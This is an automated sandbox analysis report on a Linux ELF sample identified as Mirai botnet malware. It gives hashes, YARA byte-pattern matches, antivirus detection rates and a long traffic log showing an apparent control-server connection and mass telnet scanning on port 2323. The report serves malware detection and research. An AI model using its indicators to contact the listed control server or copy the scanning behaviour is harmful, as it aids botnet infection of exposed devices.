Edit tour

Linux Analysis Report
enYTIDNSNe.elf

Overview

General Information

Sample Name:enYTIDNSNe.elf
Original Sample Name:c172d31c71333fd63839e629a6dabf2b.elf
Analysis ID:1341483
MD5:c172d31c71333fd63839e629a6dabf2b
SHA1:8598b2bef303f8336fb210cea25a13ac2c807912
SHA256:7c7290bcd96b542e211208c8799118b9bb352278ba990a029e29646d713a74ae
Tags:32elfintelmirai
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Yara signature match
Sample has stripped symbol table
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1341483
Start date and time:2023-11-13 06:42:21 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 13s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:enYTIDNSNe.elf
renamed because original name is a hash value
Original Sample Name:c172d31c71333fd63839e629a6dabf2b.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/enYTIDNSNe.elf
PID:6207
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Rakitin
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
enYTIDNSNe.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    enYTIDNSNe.elfLinux_Trojan_Gafgyt_ea92cca8unknownunknown
    • 0xfee4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
    enYTIDNSNe.elfLinux_Trojan_Mirai_fa3ad9d0unknownunknown
    • 0x473:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    enYTIDNSNe.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
    • 0x5fa0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
    enYTIDNSNe.elfLinux_Trojan_Mirai_88de437funknownunknown
    • 0xc8f2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
    Click to see the 5 entries
    SourceRuleDescriptionAuthorStrings
    6207.1.0000000008048000.000000000805a000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      6207.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Gafgyt_ea92cca8unknownunknown
      • 0xfee4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
      6207.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x473:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      6207.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x5fa0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      6207.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
      • 0xc8f2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
      Click to see the 31 entries
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: enYTIDNSNe.elfAvira: detected
      Source: enYTIDNSNe.elfReversingLabs: Detection: 65%
      Source: enYTIDNSNe.elfVirustotal: Detection: 66%Perma Link
      Source: enYTIDNSNe.elfJoe Sandbox ML: detected

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57818
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39000
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57824
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57830
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39008
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57836
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57840
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57844
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58190
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58194
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39018
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58196
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59062
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39800
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59068
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59076
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40250
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40902
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59720
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40916
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60114
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60118
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41296
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39892
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41302
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41304
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41310
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41312
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41320
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41402
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41408
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41414
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41416
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41420
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41428
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41430
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41434
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41438
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41440
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41444
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41448
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41450
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41498
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41508
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41510
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41516
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41526
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41530
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41540
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41548
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41552
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41570
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41576
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42030
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42050
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42410
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42420
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42434
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42446
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42804
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43968
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43976
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43978
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44006
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44016
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44020
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44030
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44044
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44052
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44068
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44092
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44100
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44112
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44120
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44130
      Source: global trafficTCP traffic: 192.168.2.23:46972 -> 141.98.10.82:9902
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 115.179.42.233:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 96.13.155.174:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 129.243.71.171:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 131.132.136.165:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 155.204.182.144:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 101.232.241.243:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 171.2.128.253:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 93.245.209.92:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 196.177.172.193:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 136.250.255.239:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 149.183.17.182:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 147.156.205.39:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 113.188.26.236:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 105.194.121.30:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 40.62.110.94:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 196.149.173.90:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 187.15.131.222:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 70.175.63.167:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 75.67.176.182:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 105.164.250.158:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 213.26.158.218:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 115.162.61.37:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 57.185.63.218:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 168.65.8.241:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 97.225.154.244:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 202.189.105.171:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 81.39.131.179:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 81.214.11.66:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 167.121.152.209:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 184.244.104.229:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 61.151.43.17:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 84.128.19.202:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 186.219.83.35:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 72.78.224.136:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 86.231.122.109:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 90.211.83.158:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 194.18.202.182:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 193.98.104.133:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 213.194.160.245:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 167.115.25.226:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 119.105.103.228:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 145.41.213.99:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 168.68.165.203:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 134.206.210.66:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 75.115.62.35:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 63.17.140.161:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 8.133.91.145:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 60.177.136.210:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 73.128.75.114:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 197.152.230.129:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 8.160.27.98:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 84.36.174.251:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 44.230.188.35:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 2.81.247.24:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 176.44.123.135:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 5.44.101.212:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 115.144.16.247:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 154.55.33.209:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 72.187.117.213:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 134.38.122.92:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 83.27.108.237:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 89.80.133.43:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 17.51.78.132:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 44.62.234.37:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 43.9.146.117:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 167.214.98.1:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 17.255.176.180:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 93.175.153.174:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 32.80.167.21:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 19.78.40.137:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 24.49.7.28:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 177.57.14.149:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 43.142.253.186:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 221.165.49.119:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 219.208.239.126:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 116.28.58.81:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 31.152.6.102:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 32.79.162.227:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 198.160.25.142:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 202.188.160.154:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 9.244.182.36:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 126.169.29.147:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 81.182.63.28:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 218.4.108.206:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 47.51.231.149:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 207.18.154.187:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 59.145.73.114:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 38.114.117.251:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 180.72.42.147:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 126.76.30.226:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 140.183.19.169:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 102.97.212.14:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 108.25.239.163:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 202.130.157.251:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 150.185.36.158:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 185.47.234.5:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 45.69.196.112:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 154.91.160.114:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 2.202.85.26:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 98.40.75.243:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 85.60.136.123:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 32.25.188.252:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 176.174.92.53:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 75.156.252.141:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 79.225.43.74:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 71.148.144.185:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 60.219.202.171:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 149.86.162.87:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 82.144.168.164:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 107.150.206.135:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 181.75.217.176:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 178.94.61.227:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 121.228.58.152:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 182.219.17.204:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 138.216.209.183:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 40.62.140.245:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 4.21.37.161:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 59.39.164.254:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 4.5.76.3:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 54.126.72.203:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 62.163.123.165:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 168.33.11.85:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 86.152.2.43:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 139.101.93.84:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 111.244.78.40:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 140.30.211.39:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 205.179.17.6:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 129.119.234.144:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 96.46.131.22:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 116.131.119.88:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 116.189.86.139:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 2.36.44.225:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 1.133.107.166:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 201.156.86.12:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 60.137.213.164:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 197.143.184.214:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 222.127.71.27:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 162.123.56.162:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 18.201.185.245:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 208.145.165.90:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 146.160.11.10:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 116.76.148.92:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 160.3.153.93:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 179.28.77.229:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 94.71.119.75:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 66.228.113.151:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 61.206.2.11:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 114.217.42.119:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 202.106.23.255:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 168.240.50.156:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 197.244.195.208:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 48.150.145.4:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 2.163.36.247:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 116.140.64.49:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 24.20.213.206:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 218.185.189.94:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 121.83.110.67:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 133.166.198.188:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 156.117.122.8:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 132.127.150.9:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 77.136.83.91:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 162.204.24.82:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 134.148.238.39:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 58.99.88.22:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 210.0.10.131:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 117.41.212.35:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 65.114.10.84:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 109.134.27.211:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 43.106.208.172:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 45.70.82.114:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 20.75.11.99:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 173.207.69.188:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 24.51.152.35:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 143.81.169.214:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 182.204.106.97:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 57.149.35.11:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 86.114.219.0:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 18.129.81.15:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 12.226.42.125:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 187.21.230.27:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 35.125.98.220:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 201.45.201.26:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 190.185.150.39:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 151.171.160.175:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 67.9.151.103:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 166.29.166.14:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 223.45.193.90:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 9.91.255.38:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 45.213.201.34:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 80.92.127.86:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 91.142.115.188:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 104.36.13.191:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 199.17.65.67:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 110.229.238.11:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 223.148.49.25:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 47.155.201.27:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 1.151.127.137:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 134.71.120.87:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 113.151.229.151:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 79.137.15.165:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 180.134.191.162:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 1.40.130.42:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 20.30.152.38:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 95.110.6.85:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 39.125.176.23:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 99.241.31.22:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 110.107.192.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 134.219.235.79:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 108.223.238.60:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 104.97.35.192:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 128.115.159.97:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 62.208.101.126:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 5.204.126.61:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 77.58.233.182:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 63.30.177.93:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 23.253.176.108:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 148.231.47.147:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 133.151.164.208:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 197.169.140.32:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 1.144.130.195:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 103.126.111.85:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 76.215.103.45:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 193.100.197.158:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 53.89.194.200:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 200.148.203.166:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 128.125.207.166:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 209.86.196.129:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 219.248.254.119:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 1.12.90.80:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 58.200.164.187:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 159.69.55.18:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 14.172.31.117:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 128.5.124.186:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 75.86.230.19:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 74.169.10.44:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 63.133.179.81:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 206.179.118.194:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 189.211.82.80:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 5.179.237.187:2323
      Source: global trafficTCP traffic: 192.168.2.23:52037 -> 152.67.208.14:2323
